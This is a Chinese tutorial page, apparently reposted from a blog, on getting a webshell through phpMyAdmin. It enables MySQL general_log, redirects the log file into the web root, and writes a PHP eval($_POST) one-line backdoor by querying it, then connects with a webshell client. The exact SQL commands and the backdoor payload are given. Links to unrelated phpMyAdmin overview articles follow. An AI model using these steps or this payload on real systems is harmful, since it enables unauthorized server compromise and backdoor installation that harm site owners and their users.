關於phpmyadmin新姿勢getshell-php我的管理者-PHP中文網

首頁

資料庫

php我的管理者

關於phpmyadmin新姿勢getshell

藏色散人

Dec 29, 2020 pm 05:08 PM

phpmyadmin

下面由phpmyadmin使用教學專欄來介紹phpmyadmin新姿勢getshell，希望對需要的朋友有幫助！

關於phpmyadmin新姿勢getshell

百度百科：phpMyAdmin 是一個以PHP為基礎，以Web-Base方式架構在網站主機上的MySQL的資料庫管理工具，讓管理者可用Web介面管理MySQL資料庫。藉由此Web介面可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑，尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優點在於因為phpMyAdmin跟其他PHP程式一樣在網頁伺服器上執行，但您可以在任何地方使用這些程式產生的HTML頁面，也就是遠端管理MySQL資料庫，方便的建立、修改、刪除資料庫及資料表。也可藉由phpMyAdmin建立常用的php語法，方便編寫網頁時所需的sql語法正確性。

通俗的講其作用就是可以在web頁面方便的操作資料庫。

當我們得到一個網站的phpmyadmin頁面時，下一步要做的就是getshell。

可以透過寫入shell來提權，而我們需要滿足以下條件：

1.資料庫root權限

2.知道網站的實體路徑

#3.資料庫有寫入權限

透過 select '' INTO OUTFILE '網站物理路徑' 寫入shell

#本文主要講的是在條件3不滿足的情況下成功getshell。

利用條件：MySQL 5.0

MySQL 5.0 的版本會自動建立日誌文件，那麼在服務運行的情況下修改全域變數也是可以變動檔案位置的，但是必須對產生日誌的目錄有可讀可寫的權限。

（Linux環境下可能會比較苛刻，因為網站目錄是個用戶，MySQL是另一個用戶，權限管控較為嚴格，主要取決於權限配置是否得當）

首先我們測試站點是否有寫權限

執行sql語句 SHOW VARIABLES LIKE 'secure_file_priv'

sql語句 SHOW VARIABLES LIKE 'secure_file_priv' 進行查詢尋找secure_file_priv

secure-file-priv特性
secure-file-priv參數是用來限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()傳到哪個指定目錄的。

當secure_file_priv的值為null ，表示限制mysql 不允許導入|匯出
當secure_file_priv的值為/tmp/ ，表示限制mysql 的導入|匯出只能發生在/tmp/目錄下
當secure_file_priv的值沒有特定值時，表示不對mysql 的導入|導出做限制

可以在mysql-ini檔案中設定其屬性

#經過測試，我們沒有寫入權限

然後再介紹兩個MySQL全域變數（general_log、general_log file）

general log 指的是日誌儲存狀態，總共有兩個值（ON/OFF）ON代表開啟OFF代表關閉。
general log file 指的是日誌的儲存路徑。

我們可以透過將一句話木馬寫入mysql日誌中然後移動mysql日誌路徑到網站目錄下實現getshell

執行sql語句 SHOW VARIABLES LIKE 'general_log% ' 進行模糊查詢

日誌預設關閉

我們執行sql語句

set global general_log = "ON";     #开启日志
SET global general_log_file=&#39;网站下物理路径&#39;;  #更换日志路径

#成功創建

然后执行特殊的查询语句

select  &#39;<?php eval($_POST[aaa]);?>&#39;

我们进入112233.php进行验证，成功写入shell

最后进行菜刀连接，获得站点webshell

以上是關於phpmyadmin新姿勢getshell的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文轉載於：csdn。如有侵權，請聯絡admin@php.cn刪除

使用PHPMYADMIN：數據庫管理員指南Apr 25, 2025 am 12:12 AM

phpMyAdmin是一個基於Web的MySQL數據庫管理工具，提供了直觀的界面來管理數據庫。 1.它允許創建、修改、刪除數據庫和表，執行SQL查詢，導入導出數據，進行用戶管理和權限設置。 2.通過與MySQL服務器建立連接，phpMyAdmin將用戶請求轉換為SQL命令並執行。 3.基本用法包括查看表數據，高級用法支持複雜SQL查詢。 4.常見錯誤如連接失敗和查詢語法錯誤可以通過檢查服務器狀態和使用SQL編輯器調試。 5.性能優化可以通過為常用字段創建索引，定期備份數據庫和保持結構整潔來實現。

了解關係：mysql和phpmyadminApr 24, 2025 am 12:05 AM

MySQL和phpMyAdmin的關係是MySQL存儲數據，phpMyAdmin通過HTTP協議管理這些數據。 1.MySQL是開源的關係型數據庫管理系統，支持多種操作系統和項目需求。 2.phpMyAdmin是基於Web的工具，提供直觀界面管理MySQL數據庫，支持SQL查詢和數據導入導出。 3.phpMyAdmin通過生成SQL查詢與MySQL服務器通信，用戶可通過界面操作數據庫。 4.使用phpMyAdmin可以創建數據庫和表，執行查詢，導入導出數據，並支持高級功能如優化查詢和管理權限。

phpmyadmin和mysql：完美的組合Apr 23, 2025 am 12:04 AM

phpMyAdminandMySQLtogetherenhancedatabasemanagementbyprovidingeaseandefficiency.1)phpMyAdminoffersauser-friendlyinterfaceformanagingMySQLdatabases,2)itallowsforeasyexecutionofSQLqueries,import/exportofdatabases,andmanagementofuserpermissions,3)itaids

MySQL和PhpMyAdmin：核心功能和功能Apr 22, 2025 am 12:12 AM

MySQL和phpMyAdmin是強大的數據庫管理工具。 1）MySQL用於創建數據庫和表、執行DML和SQL查詢。 2）phpMyAdmin提供直觀界面進行數據庫管理、表結構管理、數據操作和用戶權限管理。

phpMyAdmin：生成和執行SQL查詢Apr 21, 2025 am 12:03 AM

在phpMyAdmin中生成和執行SQL查詢的方法包括：1.在SQL標籤頁輸入查詢並點擊執行；2.使用JOIN合併表數據；3.優化查詢時使用索引和LIMIT。 phpMyAdmin通過直觀的界面簡化了數據庫管理，支持從基礎到高級的SQL查詢操作。

mysql和phpmyadmin：他們如何一起工作Apr 20, 2025 am 12:05 AM

我們需要將數據庫管理和用戶友好的界面結合起來，因為這樣可以提高效率和便捷性。 1）MySQL處理複雜的數據存儲和查詢，2）phpMyAdmin提供直觀的Web界面簡化管理，3）兩者協作通過SQL命令實現數據操作，4）phpMyAdmin將結果以用戶友好的方式展示。

phpmyadmin和SQL：探索連接Apr 19, 2025 am 12:05 AM

phpMyAdmin通過生成和執行SQL語句來管理MySQL數據庫。 1.用戶通過Web界面操作，2.phpMyAdmin生成SQL語句，3.發送到MySQL服務器執行，4.返回結果並在瀏覽器中顯示。

PhpMyAdmin：解釋的關鍵功能和功能Apr 18, 2025 am 12:04 AM

phpMyAdmin是一種基於Web的MySQL數據庫管理工具，通過圖形用戶界面（GUI）允許用戶管理數據庫。 1.它通過PHP腳本與MySQL數據庫交互，將用戶操作轉換為SQL查詢並呈現結果。 2.基本用法包括創建數據庫和表，如創建名為'my_database'的數據庫和'users'表。 3.高級用法支持複雜查詢和用戶權限管理，如查找特定用戶名的用戶。 4.常見錯誤調試技巧包括檢查SQL語法、管理權限和查看日誌。 5.性能優化建議包括索引優化、查詢優化和確保安全性。

See all articles